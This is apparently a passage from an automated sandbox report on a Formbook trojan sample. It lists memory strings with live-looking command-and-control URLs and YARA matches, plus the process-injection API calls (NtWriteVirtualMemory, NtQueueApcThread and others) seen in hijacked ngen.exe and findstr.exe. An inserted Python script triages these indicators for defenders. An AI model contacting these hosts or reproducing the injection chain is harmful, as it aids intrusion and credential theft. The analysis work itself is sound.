Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2h
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srfQ
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: findstr.exe, 00000007.00000003.2520276379.0000000008026000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://track.uc.cn/collect
Source: findstr.exe, 00000007.00000002.3926054651.00000000041F6000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000003876000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2627811818.0000000028C66000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://valerieomage.com/c7rq?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: findstr.exe, 00000007.00000002.3926054651.000000000451A000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000003B9A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.kosherphonestore.com/ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkji
Source: findstr.exe, 00000007.00000002.3926054651.0000000004B62000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.00000000041E2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.siteblogoficialon.com/xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8

E-Banking Fraud

Source: Yara match File source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0042B593 NtClose, 4_2_0042B593
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C35C0 NtCreateMutant,LdrInitializeThunk, 4_2_058C35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_058C2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_058C2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2B60 NtClose,LdrInitializeThunk, 4_2_058C2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C4650 NtSuspendThread, 4_2_058C4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C3090 NtSetValueKey, 4_2_058C3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C3010 NtOpenDirectoryObject, 4_2_058C3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C4340 NtSetContextThread, 4_2_058C4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2DB0 NtEnumerateKey, 4_2_058C2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2DD0 NtDelayExecution, 4_2_058C2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2D00 NtSetInformationFile, 4_2_058C2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C3D10 NtOpenProcessToken, 4_2_058C3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2D10 NtMapViewOfSection, 4_2_058C2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2D30 NtUnmapViewOfSection, 4_2_058C2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C3D70 NtOpenThread, 4_2_058C3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2CA0 NtQueryInformationToken, 4_2_058C2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2CC0 NtQueryVirtualMemory, 4_2_058C2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2CF0 NtOpenProcess, 4_2_058C2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2C00 NtQueryInformationProcess, 4_2_058C2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2C60 NtCreateKey, 4_2_058C2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2F90 NtProtectVirtualMemory, 4_2_058C2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2FA0 NtQuerySection, 4_2_058C2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2FB0 NtResumeThread, 4_2_058C2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2FE0 NtCreateFile, 4_2_058C2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2F30 NtCreateSection, 4_2_058C2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2F60 NtCreateProcessEx, 4_2_058C2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2E80 NtReadVirtualMemory, 4_2_058C2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2EA0 NtAdjustPrivilegesToken, 4_2_058C2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2EE0 NtQueueApcThread, 4_2_058C2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2E30 NtWriteVirtualMemory, 4_2_058C2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C39B0 NtGetContextThread, 4_2_058C39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2B80 NtQueryInformationFile, 4_2_058C2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2BA0 NtEnumerateValueKey, 4_2_058C2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2BE0 NtQueryValueKey, 4_2_058C2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2BF0 NtAllocateVirtualMemory, 4_2_058C2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2AB0 NtWaitForSingleObject, 4_2_058C2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2AD0 NtReadFile, 4_2_058C2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2AF0 NtWriteFile, 4_2_058C2AF0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C4340 NtSetContextThread,LdrInitializeThunk, 7_2_036C4340
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C4650 NtSuspendThread,LdrInitializeThunk, 7_2_036C4650
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C35C0 NtCreateMutant,LdrInitializeThunk, 7_2_036C35C0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2B60 NtClose,LdrInitializeThunk, 7_2_036C2B60
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2AF0 NtWriteFile,LdrInitializeThunk, 7_2_036C2AF0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2AD0 NtReadFile,LdrInitializeThunk, 7_2_036C2AD0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C39B0 NtGetContextThread,LdrInitializeThunk, 7_2_036C39B0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2F30 NtCreateSection,LdrInitializeThunk, 7_2_036C2F30
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2FE0 NtCreateFile,LdrInitializeThunk, 7_2_036C2FE0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2FB0 NtResumeThread,LdrInitializeThunk, 7_2_036C2FB0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2EE0 NtQueueApcThread,LdrInitializeThunk, 7_2_036C2EE0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2D30 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_036C2D30
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2D10 NtMapViewOfSection,LdrInitializeThunk, 7_2_036C2D10
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2DF0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_036C2DF0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2DD0 NtDelayExecution,LdrInitializeThunk, 7_2_036C2DD0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2C60 NtCreateKey,LdrInitializeThunk, 7_2_036C2C60
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2C70 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_036C2C70
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2CA0 NtQueryInformationToken,LdrInitializeThunk, 7_2_036C2CA0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C3010 NtOpenDirectoryObject, 7_2_036C3010
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C3090 NtSetValueKey, 7_2_036C3090
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2BE0 NtQueryValueKey, 7_2_036C2BE0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2BF0 NtAllocateVirtualMemory, 7_2_036C2BF0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2BA0 NtEnumerateValueKey, 7_2_036C2BA0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2B80 NtQueryInformationFile, 7_2_036C2B80
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2AB0 NtWaitForSingleObject, 7_2_036C2AB0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2F60 NtCreateProcessEx, 7_2_036C2F60
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2FA0 NtQuerySection, 7_2_036C2FA0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2F90 NtProtectVirtualMemory, 7_2_036C2F90
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2E30 NtWriteVirtualMemory, 7_2_036C2E30
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2EA0 NtAdjustPrivilegesToken, 7_2_036C2EA0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2E80 NtReadVirtualMemory, 7_2_036C2E80
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C3D70 NtOpenThread, 7_2_036C3D70
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2D00 NtSetInformationFile, 7_2_036C2D00
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C3D10 NtOpenProcessToken, 7_2_036C3D10
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2DB0 NtEnumerateKey, 7_2_036C2DB0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2C00 NtQueryInformationProcess, 7_2_036C2C00
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2CF0 NtOpenProcess, 7_2_036C2CF0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2CC0 NtQueryVirtualMemory, 7_2_036C2CC0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E68090 NtClose, 7_2_02E68090
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E68000 NtDeleteFile, 7_2_02E68000
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E67F20 NtReadFile, 7_2_02E67F20
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E67DC0 NtCreateFile, 7_2_02E67DC0
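Two things in the report above are worth pulling out mechanically: the URL list, where three unrelated domains carry the same `k06T=` query key, and the Nt* function inventory for ngen.exe and findstr.exe, which contains the write-then-execute primitives of a process-injection chain. The following Python script is an added example, not part of the Joe Sandbox report; it parses a handful of lines copied verbatim from this page (constructed sample input) and does both: it groups URLs by query key so a candidate C2 list surfaces, and it reduces each process's Nt* function list to injection primitives and reports whether both a memory-write primitive and an execution primitive are present. The primitive sets, the write/execute split, and the reading of a shared query key across distinct hosts as a FormBook-style candidate C2 list are the editor's assumptions, not sandbox output.

```python
"""Triage helper for "Source: ..." lines of a Joe Sandbox-style report (added example)."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample input: a handful of lines copied from the report above.
SAMPLE_LINES = r"""
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: findstr.exe, 00000007.00000002.3926054651.00000000041F6000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://valerieomage.com/c7rq?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: findstr.exe, 00000007.00000002.3926054651.000000000451A000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.kosherphonestore.com/ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkji
Source: findstr.exe, 00000007.00000002.3926054651.0000000004B62000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.siteblogoficialon.com/xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2F30 NtCreateSection, 4_2_058C2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2D10 NtMapViewOfSection, 4_2_058C2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2E30 NtWriteVirtualMemory, 4_2_058C2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2EE0 NtQueueApcThread, 4_2_058C2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C4340 NtSetContextThread, 4_2_058C4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2FB0 NtResumeThread, 4_2_058C2FB0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C35C0 NtCreateMutant,LdrInitializeThunk, 7_2_036C35C0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2E30 NtWriteVirtualMemory,LdrInitializeThunk, 7_2_036C2E30
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E68000 NtDeleteFile, 7_2_02E68000
"""

URL_RE = re.compile(r"String found in binary or memory: (https?://\S+)")
# "Code function: <pid>_<run>_<addr> Func1,Func2, <pid>_<run>_<addr>"
FUNC_RE = re.compile(
    r"^Source: (?P<proc>.+?) Code function: (?P<pid>\d+)_\d+_[0-9A-Fa-f]+ (?P<funcs>\S+) "
)

# Editor's classification (assumption): primitives that place code in another
# process, primitives that make it run, and the supporting calls around them.
WRITE_PRIMITIVES = {"NtWriteVirtualMemory", "NtMapViewOfSection"}
EXEC_PRIMITIVES = {"NtQueueApcThread", "NtSetContextThread", "NtResumeThread"}
SUPPORT_PRIMITIVES = {
    "NtCreateSection", "NtUnmapViewOfSection", "NtAllocateVirtualMemory",
    "NtProtectVirtualMemory", "NtGetContextThread", "NtSuspendThread",
    "NtCreateProcessEx", "NtOpenProcess", "NtOpenThread",
}
INJECTION_PRIMITIVES = WRITE_PRIMITIVES | EXEC_PRIMITIVES | SUPPORT_PRIMITIVES


def parse_report(text):
    """Return (list of URLs, {(basename, pid): set of Nt* names}) from report lines."""
    urls = []
    funcs = defaultdict(set)
    for line in text.strip().splitlines():
        m = URL_RE.search(line)
        if m:
            urls.append(m.group(1))
            continue
        m = FUNC_RE.match(line)
        if m:
            proc = (m.group("proc").rsplit("\\", 1)[-1], int(m.group("pid")))
            for name in m.group("funcs").strip(",").split(","):
                funcs[proc].add(name)
    return urls, dict(funcs)


def shared_query_keys(urls, min_hosts=2):
    """Query-string keys reused across at least min_hosts distinct hosts.

    One key on several unrelated hosts is the shape of a FormBook-style
    candidate C2 list (editor's assumption); a key seen on one host only,
    such as login.live.com's client_id, is not reported.
    """
    hosts_by_key = defaultdict(set)
    for url in urls:
        parts = urlsplit(url)
        for key, _ in parse_qsl(parts.query):
            hosts_by_key[key].add(parts.netloc.lower())
    return {k: sorted(v) for k, v in hosts_by_key.items() if len(v) >= min_hosts}


def injection_primitives(funcs_by_process):
    """Per process: the injection primitives seen and whether write AND execute are both present."""
    out = {}
    for proc, names in funcs_by_process.items():
        out[proc] = {
            "primitives": sorted(names & INJECTION_PRIMITIVES),
            "injection_chain": bool(names & WRITE_PRIMITIVES) and bool(names & EXEC_PRIMITIVES),
        }
    return out


if __name__ == "__main__":
    urls, funcs = parse_report(SAMPLE_LINES)
    for key, hosts in shared_query_keys(urls).items():
        print(f"query key {key!r} shared by: {', '.join(hosts)}")
    for (name, pid), info in injection_primitives(funcs).items():
        flag = "INJECTION CHAIN" if info["injection_chain"] else "partial"
        print(f"{name} (pid {pid}): {flag}: {', '.join(info['primitives'])}")
```

Run against the full report text rather than the embedded sample, the same two functions give the complete candidate domain list and the per-process primitive sets; in this report ngen.exe (pid 4) and findstr.exe (pid 7) both expose the whole chain, which matches the "Injects a PE file into a foreign processes" and "Queues an APC in another process" signatures at the top of the page.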
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658583480 0_2_00007FF658583480
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658581D80 0_2_00007FF658581D80
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF65856D1F0 0_2_00007FF65856D1F0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658556AA0 0_2_00007FF658556AA0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658563AC0 0_2_00007FF658563AC0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF65855B2C0 0_2_00007FF65855B2C0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF65857C3A0 0_2_00007FF65857C3A0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF6585863B0 0_2_00007FF6585863B0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658571384 0_2_00007FF658571384
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF65855BB60 0_2_00007FF65855BB60
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF65858E4B0 0_2_00007FF65858E4B0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658585490 0_2_00007FF658585490
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF65857BC70 0_2_00007FF65857BC70
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658561C50 0_2_00007FF658561C50
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658562D00 0_2_00007FF658562D00
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF6585535A0 0_2_00007FF6585535A0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658582DB0 0_2_00007FF658582DB0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658586D80 0_2_00007FF658586D80
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658582580 0_2_00007FF658582580
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658567DC0 0_2_00007FF658567DC0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658557EA0 0_2_00007FF658557EA0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658569660 0_2_00007FF658569660
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF65856FE70 0_2_00007FF65856FE70
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF6585846E0 0_2_00007FF6585846E0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF6585EC880 0_2_00007FF6585EC880
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658576860 0_2_00007FF658576860
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658585060 0_2_00007FF658585060
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF65857B850 0_2_00007FF65857B850
